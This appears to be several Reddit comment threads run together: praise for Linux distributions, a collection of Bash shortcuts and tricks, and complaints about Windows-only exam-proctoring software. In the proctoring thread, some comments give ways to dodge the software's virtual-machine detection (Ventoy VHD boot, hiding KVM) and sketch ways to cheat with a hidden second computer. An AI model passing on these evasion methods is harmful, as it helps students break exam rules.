Agreed: the best thing about Linux is that you can easily choose the distro which suits you best,  in terms of stability, security and visual appearance
As someone who frequently distro hops, thank you for making such a wholesome post. My uncle (who introduced me to FOSS and Linux) never understands why I wouldn't just use Fedora for everything. Manjaro is my current favorite, but once again I am thinking of changing since it's been refusing to install on a VM the past week...
This! 🙂
been using linux for 6 months now, tried ubuntu, manjaro, arch, mint... loved them all!! on my list: debian, fedora, red hat,  and so on...
Seriously, Linux wouldn't be what it is thanks to the labor of love of all these contributors and maintainers out there <3

Thank you for all your hard work, no matter how big or small the project or distro is.
Agreed, people who knock on others because the distro they choose are petty. Linux is linux man, be glad it's getting more well known and more people are interested.
Every distro(including BSDs, OpenSolaris)  and its developers and users have a direct and sometimes indirect ways to contribute to the FLOSS community.  
Be it by testing bleeding edge s/w or by tinkering around, or introducing new ideas(like new pkg managers, etc) and another group helps by creating articles/blogs and vlogs for the new users, thereby fostering the community !
They're all wonderful, it's not always easy to pick one as they are all special in their own ways
Tbh, can’t believe Opensuse/SUSE was missed off here, given the significantly greater marketshare of paying customers compared to Ubuntu and the fact they’re eating away at RHEL ~15% year on year!
I love things about every distro I’ve used. I’m on pop now but was on Ubuntu for the longest time. Used mint, void for a bit, and a million smaller ones and I’m always excited to try a new one.
Here here! *Klinks glass*

Also openSUSE rep. 😎
The Arch wiki is definitely badass.
I use Artix, btw. Nah, but this is really true. I spent a long time distro hopping to see what suited me, from Ubuntu/Pop!_OS to LFS, Gentoo to openSUSE. It’s truly what fits your workflow and style. Awesome wording OP!
Why didn't you even have the decency to mention X!?! Burn him!
<3
just install awesomewm lul
You've never actually used RedHELL, have you?
You should have signed off your post with "BTW I use Arch".
Said by an arch user it's very Said by an arch user it is amazing!
Every distro's needed
Every distro's great
If one's discontinued
Torvalds gets irate
I used Ubuntu, Manjaro, Fedora, but I settled on Arch. But I'm not gonna put it in everyone's face that **i UsE aRcH bTw**
Also: most wholesome Linux post
Each to their own......most so called distros are actually just someones ideal created from a true distro, one which actually compiles the source code. The main difference between distros is their package management systems - you find one you like & stick with it usually.

Each & every version of Linux is perfect for someone, sometimes the amount of choice is confusing, especially to the new comer, but they soon find something to suit their needs.

Long live freedom of choice....
I completely agree. Btw I use arch
 g
Call me a downer, but that's like saying living as a beggar is awesome because you don't have a job. 

Blind positivism is -not- the way to go, OP.
is there a chat room for zorin distro users?
Been using Linux for the past 17 years. Funny thing, I'm still learning new things. It's like Linux has infinity learning experience. That alone to me is awesome. 

To me Linux is all about freedom of choice and preferences. My old saying is; There is no wrong choice, just choices. You choose one and run with it.
If Mr. Rogers was a dev
I would add that even the worst linux distro is still much better than any version of Windows. Every time I have to use Windows, it's like the system is fighting back instead of just letting me change that one frigging setting I want to change so I can print.
I've been using GNU/Linux systems on-and-off since before kernel version 1.0 (Slackware on floppies!), and professionally since 1998.

As of this week, I use PopOS and I'm not planning on changing that. It works fine. `sudo apt-get install haskell-platform` works just the same as on Debian or Ubuntu. When I went to move files to my spiffy new machine, I used a combination of "newbie-friendly" features (enabled link-local Ethernet on both machines via the GUI) and "old-school" tools (`rsync`, accept no substitutes).

I don't want to spend time fixing my OS; I want to *use* the OS I've been familiar with for 20 years to get a goddamn terminal, editor, web browser, and [Euterpea](http://euterpea.com/) so I can play around with purely functional music programming.

(OTOH, I really hope someone is getting paid by Valve for tempting me to actually install Steam and waste all my time on games.)
It's Pop!_OS, not PopOS.
don't we all use different distro's all the time or at least throughout the years? at work i deal with rhel, at home i use ubuntu & debian. but in the past i've moved between fedora, suse and so many others.  
it's part of the fun and the freedom to use whatever you want that makes linux so great.
Yet, you didn't even mentioned openSUSE :(
Linux is awesome because its Linux, every distro is awesome because every linux distro is actually linux
*Sad Slackware noises*

But seriously though great post!
Red Star OS is awesome. You heard it here boys.
[deleted]
There's different linux distros for a reason. That's that's because they each have different purposes.

But, in my opinion, arch is the best desktop distro for techy people.
I like every distro except for Ubuntu. It’s devs make terrible choices. Mint is a better “just works” distro and Debian is a better “just works” / minimal distro. The only thing good about ubuntu is that mint was born from it.
Gentoo:

Package block

Version block of package

Use flag block

... Nah gentoo sucks

Nuked both my computers of that monstrosity. Went with Linux from scratch instead.
Manjaro is Arch+.
What about Alpine?
Except for [Red Star OS](https://en.wikipedia.org/wiki/Red_Star_OS)
these are some strong opinions coming from an arch user

sincerely, an arch lover
I use arch because is the only just work for me, potato pc
What about Red Star OS?
I like Ubuntu because I need an OS that works so that I can get work done. Other distros are fun to play with but for a daily driver, I trust Ubuntu.
finally some praise for Apartheid Linux and RedStar OS ^/s
Ubuntu is awesome??? Always has been. Seriously, for all the hate I give Ubuntu nowadays, if not for Ubuntu, I would not have become a Linux Chad, and there is no denying that.  


Btw I use Arch :3
What about FreeBSD? :(
So many hate it. But I think Android is best Linux distro
 At least from security point of view
[deleted]
A few months back I mentioned the thing about "Ubuntu bad arch good" and everyone acted like I was crazy. They dead ass told me they've never seen hate for Ubuntu.
Instead of typing the clear command, we can type \^L (CTRL + L) to clear the screen. Then \[Tab\] for autocomplete file and command names on Bash. There is also \[CTRL+r\] for recalling commands from history.  Don't be shy. Share your fav Bash tips and tricks below. 

Obligatory:

* [Bash Wikipedia page](https://en.wikipedia.org/wiki/Bash_(Unix_shell))
* [GNU/Bash home page and docs](https://www.gnu.org/software/bash/)
* Credit goes to [Clicmagic](https://twitter.com/climagic/status/1402312419540668418) on Twitter
I like using "$_" to take the place of the last parameter of the previous command. For example:

     mkdir newdir
     cd $_
`Ctrl + r` to search through your command history

Someone also pointed out to me that you can combine this with comments at the end of commands to tag them for later. E.g.

```
rsync -aAXHv --exclude={"/backups/*"} / /backups #full system backup
```
Linux is turning 30 on August 25th btw
[deleted]
"Sudo !!" Runs the last command as sudo
<(some command) 

Executes some command and creates a temporary named pipe with the output. Really useful for commands that needs a file name, but you don't have a file. Example:

comm <(sort file1) <(sort file2)
vi mode!

https://www.gnu.org/software/bash/manual/html_node/Readline-vi-Mode.html
Overwrite Environment Variables by supplying them in front of a command like

    $ PYTHONUNBUFFERED=1 python test.py
I just want to point to this very cool website that explains any shell command in a very informative and helpful way.

[ExplainShell](https://explainshell.com/)

Go ahead and type your favourite command and see what it means.

I wish there is a cheatsheet websote that is easy to search and has all the most useful one-liners ready to go and easy to understand.
Perhaps everyone knows this already but I discovered recently that you can do tab completion on shell variables. Try typing ``echo $`` and then press tab twice. You get a list of all available variables.
Quick-find/replace for a previous command using the ^ character, i.e. \^searchterm\^replacement

$ sudo apt update

...

$ \^dat\^grad

Replaces "dat" in "update" with "grad" to rerun the command with "upgrade"
Bash provides TCP and UDP pseudodevices. For example, if you want to test that port 443 is reachable on google.com, you can do this:

    echo 1 > /dev/tcp/google.com/443 && echo 'ok' || echo 'not ok'

This basically functions like netcat, so you can use it to write a script that needs a TCP client without needing netcat to be installed.

You might think that because it is under /dev, it is provided by Linux but it is actually provided by the bash shell.
I use emacs short keys for navigating and editing in the  current command line.
I actually have this in my `motd.sh` file:

`/bin/fortune \| /bin/cowsay -n` pipes the output of `fortune` into `cowsay` so that, in my case, I can have a cow greeting me with whatever snarky qotd is chosen whenever I log into my computer.
`$()` instead of ``.

Gets rid of a bunch of error-prone backslash-escaping, can be nested (even inside quotes), it even seems to have better syntax-highlighting.

---

`set -xeuo pipefail` at the top of your scripts.

Opinions differ about this one, and whether it's more or less safe than the default. IMO the default is pretty bad: Your script doesn't log what it's doing, ignores all errors (unless you explicitly catch them with `||` or `$?`), and can *easily* end up doing stuff you didn't intend. This mode does:

* `set -x` -- print all commands before executing them, making it easier to debug WTF your script does (generally more useful in system scripts rather than interactive commands)
* `set -e` -- exit on errors
* `set -u` -- exit on undefined variables, instead of just evaluating them as emptystring, forcing you to fix your typos in variable references
* `set -o pipefail` -- count an entire pipeline as failed if an earlier stage fails, so `ps | grep foo` fails if `ps` *or* `grep` fail.
`Ctrl-w` to delete a word backwards
`ctrl+u` clears the line, which also works for passwords. Get partway through your password and think you messed it up? Don't press backspace a million times - just press `ctrl+u`
U can create an alias that replaces itself. For example here's how I lazy load thefuck.

```sh
alias fx='eval $(thefuck --alias fx) && unalias fx && fx'
```

Oh also, if an alias has a trailing space the rest of the alias is also expanded. This lets u do stuff like sudo. `alias sd='sudo '`. So if you have your editor aliased to `alias e=vim` u can run `sd e` to run `sudo vim` (without the space it would be `sudo e`.
[shellcheck](https://github.com/koalaman/shellcheck), a static analysis tool for shell scripts. Caught me loads of bugs already.
Ctrl + A to move cursor to the front most. Ctrl + E to the last. This helps in some ways to edit certain parts of your long command.
This is _far_ less useful than any of the other tips posted here, but converting a .png of a favourite character to ANSI using something like `img2ponysay`, storing it to a file, then adding a line to `cat` the ANSIfied image to stdout to your .bashrc makes it 'feel' like your computer's happy to talk to  you whenever a new shell is spawned.

&nbsp;

Idea shamelessly stolen from https://tylercipriani.com/blog/2014/05/22/creating-baller-useful-motd-ascii-art/
My favorite trick is to do something like the following to run one command against each line of a previous command:

`cat somefile.txt | while read i; do someothercommand "$i"; done`

It feels very "functional" and it easy to keep appending additional transformations.
Something I've carried over from ksh:

**set -o vi**

I've never understood why the default command line editing mode was set to emacs. (And I'm shocked at how many people don't realize it's configurable.)
`!!` will return the previously run command, so you can do stuff like `sudo !!` if you forgot sudo or `!! --shitass` if you forgot the --shitass switch
People usually use "Ctrl + r" to search through history, but I prefer adding this to my bashrc:

bind '"\e[A": history-search-backward' 

bind '"\e[B": history-search-forward'

It feels a lot more intuitive to start typing a command I remembered I used and then just type the up arrow to go through searches that start with what I typed.
Some caution, know your scoping. One of these writes to the associative array in a way that can still be used, one does not:

    declare -A happy_array; generate_text | while read -r parts of that text; do happy_array[$parts]=$that; done
    echo "${!happy_array[@]}"

No results!

Done again without a subshell:

    declare -A happy_array; while read -r parts of that text; do happy_array[$parts]=$that; done <<< "$(generate_text)"
    echo "${!happy_array[@]}"

This works as expected.
loads of great tips here
Ctrl-X Ctrl-E will launch your $EDITOR to edit current command line. When you save and exit, it will be executed.
~~~sh
echo "Happy Birthday" "Bash"
~~~
Now, if you press `Ctrl-p` the last command is **printed** (**not** executed). 
~~~sh
echo "Happy Birthday" "Bash"
~~~
Now, if you were to print just the last parameter, just press `Alt-.` (`Alt` and then `.` dot). It should print the last parameter `"Bash"`. (_Yes, if you just do `echo !$` and hit `Enter`, it will use the last parameter, but, `Alt-.` makes that parameter visible as though somebody copied and pasted it. That is all the difference_.)
~~~sh
echo "Bash"
~~~
The `command` builtin command is often very useful when `which somecommandname` doesn't turn anything up, despite `somecommandname` showing up in the list of options when hitting tab, and especially if `which` says one thing, but it's clearly not whatever `which` found that's running.

`command -v` is a lot like `which` but will pick up on shell builtins and functions and can be used just like `which` if you want to interpolate it into `$(somecommand)` output grabber.

`command -V` prints extra information about whatever `command -v` would find. e.g. `command -V command` says "command is a shell builtin" and `command -V echo` reminds us that "echo is a shell builtin" too, despite `which` suggesting `/bin/echo`.
i like bash a lot, but is there any history as to how/why it became the preferred shell?  There were a lot it seems (Borne, Korn, cshell, etc).
In `~/.inputrc`,

    set show-mode-in-prompt on
    set vi-ins-mode-string \1\e]12;green\a\2
    set vi-cmd-mode-string \1\e]12;yellow\a\2
    "\C-_":"~/"
    "\e[29~": vi-movement-mode

(for some reason, when I type ctrl-slash it generates ctrl-uscore)

In `~/.bashrc`:

    psgreen='\[\e[32m\]'
    psyellow='\[\e[33m\]'
    psbold='\[\e[1m\]'
    psuscore='\[\e[4m\]'
    psplain='\[\e[22;24;25;27;28m\]'
    psdefault='\[\e[0m\]'
    PS1=$psgreen$psuscore'[\u@\h '$psbold'\W'$psplain']\$ '$psyellow
    PS0=$psdefault
Can I ask ya all a stupid question.. is bash just what we see or do different shells run totally different commands? I see people talking about Zsh a lot and I'm trying to understand - is that just a graphics change or do I have to relearn everything?
I’m exactly one year older than bash. Neat.
Add this to your .bashrc:

`TAB: menu-complete`

Now you get the Zsh style autocompletion via cycling through a menu.

And then add this to you .inputrc:

    ## arrow up
    "\e[A":history-search-backward
    ## arrow down
    "\e[B":history-search-forward

Now you get Fish style history completion by typing something, then pressing arrow-up.

There are many others as well. Basically you actually can implement quite a lot of the user-friendly features of Zsh and Fish right inside Bash.
I don't have any bash tips (sorry), but for anyone using fish, press shift+tab and you can search the list of tab completions instead of tabbing through the whole list
32 is the default shell on many Linux distros?
Awww when I started I’m pretty sure it was csh that we all used.
All the emacs like movement commands like Ctrl-f ctrl-b for 1 char forward/back Alt or Meta f or alt-b for word forward/back C-t to exchange two characters from place Alt-t to do the same with words.    
C-k to delete from the cursor to the end of the line, C-y to paste the cut part. Alt-< to go to the first command in the history.   
C-d to logout

C-x C-e will drop you in an editor that allows for easy multiline command editing that will get executed afer saving and exiting the editor.  Very handy to when you have some commands that need to be repeated on several hosts and you do not have a  shared dir to keep a  script in. 

Log in to the host C-x C-e paste the commands from your paste buffer, save, exit, after the commands finish C-d, log in to the next one and repeat.
Happy Cake Day bash!

Nothing earth shattering, but if you want to capture input keys, you can do it with read. To capture 5 keys would be

`read -rsn 5 KEY_CAPTURE`

An example use case, atleast for me, was capturing up and down arrows, and enter as select when creating a navigable menu. Also kind of neat, but there are simpler ways, if you want to generate a really complex random password and don't have any CLI tools or internet access

`</dev/urandom tr -dc '[a-zA-Z][0-9]!#&*<-/<=>[\]^_{|}~' | head -c 16`

Switch the 16 at the end for another number to adjust the password length
I'm not sure how long apt install has had tab competition, but I just discovered it and am pretty excited
Happy birthday Bash. I love you.
Entertainment in the shell...

    telnet towel.blinkenlights.nl

Not bash specific, but fun and it work there.

*edit: awwww it looks like after decades, this fun little time waste no longer works. Is anyone else able to reach it?
cd - for switch between previous and present directory
I recently downloaded a lot of photos from FB platform and photos from their platform have an exif data used to track the image accross the web, if you ever repost the downloaded photo somewhere else.

So I found a way to batch remove all exif data using `jhead` and `exif` from `pip`.

This may such a basic thing but it's fun to be able to do this via CLI. Yes I'm quite new to Linux.

Use
```
find . -name "*.jpg" | xargs EXIF.py
```

To print exif data of every photos.

Then use
```
find . -name "*.jpg" | xargs jhead -de
```

To delete all exif data from every jpg files

You can then use `EXIF.py` once again like previously to check if everythings is gone. I have like 200 photos and they are all modified within seconds, it's so satisfying.
Tmux in my office won ‘command line utility of the year last year’ - managing bash shells has never been so easy
[cd -] takes you back to the previous directory you were in. Pretty cool haha
Bourne. Jason Bourne.
Not really a trick, but `top` is a handy command to see what processes are running and how much memory they are using
fzf + command options and fuzzy ctrl+r history [autocomplete.](https://i.stack.imgur.com/Qiauw.gif)

Add the history id in your prompt, e.g.  `PS1='[\! \w]$ '`  Then you can easily re-run visible prior commands in the terminal with ! + history id (e.g. `!100`)

If you really want to pimp out your shell, install zsh, ohmyzsh, powerlevel10k, fzf, lsd, bat, and tmux.

Use bash for scripts meant for desktops or specific distros.  Use posix /bin/sh for more portable, but harder to write, scripts.
double quote everything
create a file named /tmp/foobar, make it excutable
write #!/tmp/foobar in the first line, and run it.
Who clears terminals?
chsh -s $(which zsh)
This is going to be an unpopular opinion but BASH is a terrible shell and I really hate that it became the default for so many distros. UNIX at it's heart was C-inspired and it's too bad a C-like shell like tcsh didn't become the default. (Don't give me any of that "C Shell considered harmful" crap... most of that doesn't apply to TCSH and/or has been obsolete for a long time and at this point it's just a regurgitated meme.) The main problem with BASH is the scripting language is awful. If you don't script for 6 months you have to relearn its obtuse syntax. Now I'm not claiming TCSH is perfect but it's syntax is much easier to remember by comparison. TCSH is not without limitations but I do think something similar to TCSH could have become effectively perfect.
`fish` is better though

huh... random tip... `begin` blocks

as in

    begin
          ls 
          timedactl
    end | less
CTRL-r for reverse search
xkill
Most of us probably already utilize .bash\_aliases. I use it to death especially for those long commands. If I can shorten that command with an alias (and I usually can) then I'm a happy camper.

I am also using some of the new recommendations mentioned here to make my bash a little more enjoyable. 

Before switching to Linux full time in 2018, I tried to avoid the terminal at all costs. Now, I use it every day multiple times per day. It's such a cool feature to use in Linux!
Cake day?
https://shellcheck.net for linting scripts for problems
Esc + . for previous command's arguments.
Not specific to Bash, but `alias dokcer=docker` saved me a lot of time
>type \^L (CTRL + L) to clear the screen

    $ ^L

Uh huh ... that's what I get when I type Control-L - and yes, with bash.

`set -o vi` does come in exceedingly handy, though.  :-)

>default shell on many Linux distros

Well some distros aren't so bloated ... at least by default.  ;-)

    $ stat -L -c '%i %s %n' /bin/{,[bd]a}sh | sort -bn
    315703 1168776 /bin/bash
    315748 121464 /bin/dash
    315748 121464 /bin/sh
    $ 

But I do think bash has one feature that's sufficiently useful it ought get added to POSIX:

    Process Substitution
        Process  substitution allows a process's input or output to be referred
        to using a filename.  It takes the form of  <(list)  or  >(list).   The
        process  list is run asynchronously, and its input or output appears as
        a filename.  This filename is passed as an argument to the current com-
        mand  as  the  result  of  the expansion.  If the >(list) form is used,
        writing to the file will provide input for list.  If the  <(list)  form
        is  used,  the  file passed as an argument should be read to obtain the
        output of list.  Process substitution is supported on systems that sup-
        port named pipes (FIFOs) or the /dev/fd method of naming open files.
        When  available,  process substitution is performed simultaneously with
        parameter and variable expansion, command substitution, and  arithmetic
        expansion.

Other than that, I think most of bash is bells 'n whistles and bloat ... some of which is appropriate for interactive use ... but for more generally programming?  Meh.

So ... interactive use - sure, I use bash.  Programming ... mostly sick to POSIX and mostly use, e.g. dash.  But ... when there's justification ... sure ... sometimes even program for bash.  bash's Process Substitution is probably the most common reason I find that justifies coding something in bash.  Sometimes that Process Substitution is just so much better than alternative approaches - that it will warrant bash for that.
Parameter substitution... in general. This stuff...

    bash-5.1$ FOO=foobar
    bash-5.1$ echo ${FOO#foo}
    bar

    bash-5.1$ BAR=foodbear
    bash-5.1$ echo ${BAR/dbe/b}
    foobar
It can't be 32 years old; I remember that it was the new shell back when I was in college.

… OMG …
I love the 32 shell
Put `set -o vi` in your bashrc and enjoy the vim-way on BASH!
You guys already hit my fave tricks. One of those things that once ya know it, you just want to tell everybody how cool it is.
I wrote a peoplesoft app server menu wrapper inside bash using a here document.  Let’s be honest, no one prolly used it after I left.
Pro tip: Replacing bash with zsh lets your beard grow at 2x the speed and 3x the silkiness.

Serious pro tip: advanced bash scripting guide is awesome, go and study it, even if you think that you know bash scripting.
I like to chain scripts/commands with &&

<command 1> && <command 2>

Benefit: if the first fails, the second is not run.

You can chain many more than 2 obviously.
Being able to customize the IFS is one of my favorite tricks and allow for some quick and dirt file parsing. Don't rely for anything serious, but it's great for one-off parsing.  

    ; cat test.csv
    id,name,age
    1,bash,32
    2,linux,25
    3,c,50
    
    ; tail -n+2 test.csv | while IFS=',' read -r id name age; do echo "$name is $age years old. Happy birthday"; done
    bash is 32 years old. Happy birthday
    linux is 25 years old. Happy birthday
    c is 50 years old. Happy birthday

plus using that with `jq` and the builtin `| @csv` filter is great to quickly parse some json/jsonlines file.
If you stream into a subshell, you can have a second program pick up where a previous program left off with that stream. Example:

    $ { grep -m1 c ; cat ; } < testfile # -m1 quits after the 1st match
    c
    d
    e
    f
    g
    h

Great for, say, grepping a log file for a timestamp and catting everything thereafter, without trying to `tail` the right number or whatever.

I'm also a real big fan of the penguin operator for things like `diff <(check-things) <(ssh me@elsewhere check-things)`

Also remember that you can pipe just about anything through SSH. If you're dumping things to files and copying them around just to use them once, consider the following example (there's other flags you might need to make these work well, these are for general inspiration only):

`pg_dumpall | ssh dev-server pgsql` (that is, read the whole database contents out and insert it directly into another instance of postgres - there's equivalents of mysql of course)

`dd if=/dev/baddisk | ssh backup-server dd of=baddisk.dd`
I honestly just love aliases !!! I can change directories and execute based on two letters.
`Escape .` inserts the last parameter of the previously executed command.

Repeating the sequence (e.g. `Escape . Escape .`) goes back in history.
```
set -o vi
```

I know more readline than bash technically, but once you get used to it, you'll never want to go back.
    alias noslash='bind "set mark-directories off"'
    alias slash='bind "set mark-directories on"'
    alias lsdirs='ll -d *'
    alias svim='sudo vim'
    alias blastlast='kill %%'
    alias gob='cd -'
    alias igob='cd - > /dev/null; echo -e "You were in: $OLDPWD\nNow you are in: $PWD"'

Few handy things to use, you would use noslash to switch off adding slash at the end of directory completion, slash to switch that on again, blastlast to end process there were probs with and you had to press Ctrl-z and svim to edit files with Vim as admin, f.e. svim setup.conf. Possibly it's not super fine but applicable. :)
pressing bckspace in a long tab autocomplete list will cancel that list, instead of spamming enter and hoping you dont rm -rf your documents folder
`xdg-open` can open most stuff in the default program for that file type.

I have it aliased to `xo` and use `xo some_file` all the time.

Or for example to open the current folder `xo .`
Happy Birthday Bash. Hope you get to "she-bang". \^.\^
Ctrl+l will clear the screen, just like the clear command.
Buddy of mine is taking a class in college for Linux Administration. Its 100% remote. The class is literally ALL about Linux...

But the software the school uses to conduct exams only works on MAC or Windows and you cannot use a VM cause the software will detect you are on a VM and tell you can't use a VM.

So my buddy just had to take his first exam for his Linux class on a Windows install.

His professor has acknowledged the irony, and stated the college only permits this software for exams, it must be done on a Windows Or Mac install and you will need to maintain a Windows install to take the Linux class.

**Edit**

Some people are suggesting ways to try to get around this measure...here's the deal if you do that, or attempt to do that, and you get caught...you could end up giving a 0 for the test, you could end up being kicked out of the class, or in a worse case situation get expelled from the school.

So simply following the rules, and getting your degree is the smarter option. Also its not that hard to dual boot linux/windows

**Edit 2**

Both of us go to the same school, both us knew the rules when we started, any attempt to get around the requirements could result in academic penalties which could include being expelled. Any attempts to get around the requirements is simply not worth the risk.
The worst part is that those programs are basically rootkits, it's an abuse, I'd install that crap on a vm and never on my real hardware, even if the os is compatible.
A few years back I taught an online course at a university that gave all incoming students iPads. The proctoring service they used was not compatible with iOS.
I would not install that on a main PC/partition, that shit is rootkit-worthy. Create a new partition - even if you have Windows already - and install another Windows to it, wipe it after the semester.
Instead of a pure Windows VM, use Ventoy. This allows you to install a Windows VM and then boot it on bare metal while it runs from a VHD file.

Proctoring system won't catch it because it's Windows running on bare metal, but no permanent changes are made to the disks and if you don't mount your Linux disks, you retain the same isolation as with VM.

It works well, I use it to play games with intrusive anticheat.

https://www.ventoy.net/en/plugin_vhdboot.html
Had to do the same thing a few months ago for a class to get my LPI Linux Essentials cert.  Not sure why, though as it was proctored through zoom
r/mildlyinfuriating
I could scream reading this.

( "It's because they made the software for the most commonly used OS, and the one they use!") 

If they could bother making it work on a Mac, not having Linux support is pretty pathetic!

That's not even to mention it's a Linux class, which gives a terrible impression of Linux itself if you have to use Windows or MacOS just to complete the module, then again would you be taking the course if you already run Linux as a daily OS? Who knows lol, either way it's pretty weak, you could learn those skills regardless of what OS you use as most of the specifications and methods are interchangeable.

I also don't get why the need for a proctoring monitor would be required for a Linux course, as we all just websearch and irc for any solutions to our issues anyways if we don't know them, guarantee you most people, even admins of large networks don't know every little minor detail, and still have to look stuff up from time to time.

Needless to say it's another example of offering a course for people intending to learn, and then treating them like they're just there to pretend to learn, especially in College where you literally pay for the courses anyways so it's no hair off their backs regardless.
Proctored tests should not exist. Instead of a test, they should be assigning a comprehensive capstone project.
Gotta run Easy Anti-cheat
[deleted]
In my college there was 5 whole years where the Windows Administration class was only held in the Mac lab. Full of iMacs running Windows. Imagine using the keyboard shortcuts.
This reminds me of the anti-cheating hacks which often don't work on linux.

One day we will overcome the Windows monopoly and free the world.
I'm a linux user and had to take the toefl exame last week. Their proctor only works on windows or macOS so I had to install windows on dual boot. Im still pissed about it.
I worked at a place once where we were doing linux development work. It was a product that ran only on linux, was built on linux, and debugged on linux. The development tools ran only on linux.

Company got bought by a conglomerate, which mandated we all switch to Macs. Now I have nothing against Mac, but it was literally impossible for us to do our jobs on MacOS.

Some people wiped their laptops and installed linux, but they then lost all IT support, including for failed hardware that had nothing to do with the OS. Others used a VM. Some used ssh and vnc or remote desktop into servers at work.

The whole thing was idiotic.
Meanwhile my university didn't proctor any of the IT department exams. I think they realised that a bunch of IT students would see it as a challenge.
I had a class where the professor was not negotiable on those software proctored exam, regardless how I presented the reason it's not safe from a cyber security standpoint and there is no need. It was an elective so I just dropped the class and chose something else. It's not like I don't want to learn DSP. It's a subject that interests me a lot. If a professor doesn't care about the student's suggestions, I don't think they will teach the subject well anyway
It’s a lesson on capitalism and the private industries impact on education.  

My kids chromebook is spooky with what data it seems to collect.
Does the college also provide the Windows license?
These environments are worthless at preventing cheating other than the laziest possible kind. You could still use a single bluetooth ear bud to communicate or a second computer or phone to cheat.

Example usb input switch to switch between controlling one computer and another connected to a TV mounted facing the same direction as the camera off before test and on silently thereafter.

Instead of trying to win an arms race with students you would be better of having more assignments that are hard to cheat on in the first place. For example essay questions that require you to be conversant on the topic in order to provide an apt in depth answer.
For something this invasive, I’d be tempted to get a secondhand cheap laptop exclusively for Windows and the proctoring software. I know even $150 can be a big ask for students, but you should at least check if your university has any surplus stores or ways to buy used equipment. I was able to buy some old dell optiplexes for just $50 when I was an undergrad.
Scanning student rooms during tests was ruled unconstitutional by a district judge.
https://www.npr.org/2022/08/25/1119337956/test-proctoring-room-scans-unconstitutional-cleveland-state-university
As annoying as it is, you gotta realize that there's the Linux community and there's the rest of the world. If you're enjoying your class, then the sacrifice is worth it.

If it makes you any happier, the Linux Professional Institute requires similar software for online certifications (Paerson OnVUE).
If it's the software I'm thinking of you should be able to run it in a VM with some tinkering.  I didn't want to risk that though and thankfully my school has computer labs we can use.  Higher education has been the only road block I've ran into when it comes to linux, and I've been using it for almost a decade now.
Can´t you hide virtualization from Windows when using kvm? Anyways who pays the Windows license? Them I hope? xD
Digital proctoring should be illegal.
The class is a Linux Administration class, correct? Something like what System Admin role would use? I hate to burst the bubble but that's 100% real world preparation right there. Talk to pretty much anyone in a System Administration/Engineering role who deals with Linux systems and pretty much all of them are going to tell you they have a organization issued workstation that is either Windows or Mac.
I have been there:

* [https://www.reddit.com/r/linux/comments/vubevu/my\_online\_testing\_platform\_doesnt\_support\_linux/](https://www.reddit.com/r/linux/comments/vubevu/my_online_testing_platform_doesnt_support_linux/)
Taking Linux admin online currently.  I approached a professor that I got along with rather well a few months back, to ask about potential pitfalls of installing Linux on my last remaining windows machine.

He reminded me that the degree program requirements specified Windows 10, and that letting students use multiple operating systems would ultimately result in a lot of students getting themselves into trouble.

It's stupid, but in my experience most of my cohort are terrible at, and terrified of, Linux.  I fucking love the CLI, and I'm positioning for a Windows free(ish) future and career.  I'm 41 though, so seeing a terminal doesn't fill me with terror and dread.

I've always loved computers and tech, but that's not the typical IT student.  You have to keep in mind that a huge chunk of students choose this degree because they've been told that it's a free ticket to 6 figures.  Which, yeah that can happen, if you live and breathe this shit.  They don't, and they'll find out in a few years most likely.  The university however, has an obligation to set them up for success, even if they don't have the passion to grasp it.

Sounds like your friend might be an exception, he definitely isn't the rule.  I loved my first Linux admin course, and I'm digging my second as well.  Good luck to him!
What are the requirements to claim a religious exemption?
Ah, Examplify. I work IT at a university's law school and we use it there too, because that's what they use for the bar at many nearby states. I am not the one who decides such things, I just make sure it works for everyone. This is the first year I've seen students with chromebooks in the incoming class, and had to be the bearer of bad news that they would have to get a Windows or Mac PC to take their exams.

They also offer remote proctoring, and my school considered that during the lockdown phase of the pandemic, but concluded that it infringes on privacy too much in a precarious situation where many students are already stressed enough having to do law school while coping with a quarantined life, and any normal signs of living such a life could be false flagged as cheating. We'd be paying out the nose to make students more stressed when we could just have the faculty redesign their exams.
We all have a uncle we don't like. 
In every family get together he will be present. 
Will annoy you or ignore you purposely. 
Make you wanna thrash his head on the floor. 

Yet you will have to be civilized and put up with him. 

That's the way it is. 

We are all grown ups and know when and where to show our true colors and when and where not to. 

Hence no need to get angry or frustrated. 

Just appear on the exam, get it over with and then never talk about it.
I'm sure it'd be easy to fool the app into thinking it's not within a VM. But I wouldn't risk it. It is what it is.. Windows and MacOS have always dominated the personal and corporate workstations. Linux dominates in the cloud. Just accept it and move on. When I was in class I just ran a Windows computer and ran Linux VMs. It worked out much easier that way TBH.
I'm glad I don't have kids. This is insane. This world is going to hell in a handbasket.
Sounds like they shouldn't be teaching Linux
No one should be paying tuition for such a garbage school.
All the stupid ass remote testing software for my certifications had to be done on Windows too. The training program and certification company uses a third party company who are apparently run by tech illiterate monkeys. 

During COVID, I had to image a Windows computer just for the test. But today, I'm lucky I live in a city with access to a library or I can head down to the testing center.

Because it's not just having a Windows computer. You also have to install their malware.
Contrarian opinion: first I don’t like the invasion of privacy and forcing a technology aspect of this. But in an online environment cheating has become so rampant that testing in at least US colleges has become a total joke. And I know that a part of the answer is that we should test higher level knowledge and that makes cheating harder. Except it really does not, and in many disciplines mechanical (low-level) knowledge is needed for the higher-level stuff to make sense. Think of Math, Physics, Engineering, CS, Economics, Statistics, etc,.

We need to solve the college cost crisis in the US somehow, but online education so far has been mostly an unmitigated disaster accelerating the race to the bottom. It works for the few self-motivated students and can be the only option for many due to life situations, but for most students it does not work and our students are learning less and less with it. Next time I hear some idiot pontificate about MOOCs I will blow a gasket. Perfect analogy: I have been listening to history podcasts lately. It is entertaining and I am learning quite a lot. But I am not pretending that I am getting a college degree in history. 

This rant is a long way of saying that I am pretty much for all anti-cheat measures regardless of their invasiveness. We really have here only a choice between a really bad and even worse solution.


Source: I am a college professor in an unrelated discipline. And in my professional life I push and market online degrees since that is where the money in higher ed is now.
Idiocy.

What exactly are these programs doing?
WinToUsb or Rufus. Use portable Windows. No need to install.
It's really easy to detect a vm (e.g. via virt-what). But can this software detect WINE?
Fucking glad I'm not a student anymore.

I remember taking one online exam thing for some skilling programme at work, had to use a proctoring software that would warm you if you look away for too long. Only took the introductory bit of the programme and noped out after the first exam. 

I'm glad it was through work and on the work laptop, but it felt creepy as hell


Edit, warn* keeping warm
Too bad they can't look at something like Red Hat uses for their certification exams, it's a bootable USB that \[allegedly\] doesn't touch the system drives.
Just take an offline exam??? no? skip one seat, mandatory masks, less students per shift.... no?
it's for spying on the students so they do not cheat.

Happens at a lot of schools now.
I had the same problem interviewing with Amazon as a new grad, my only computer with a webcam only had Linux installed
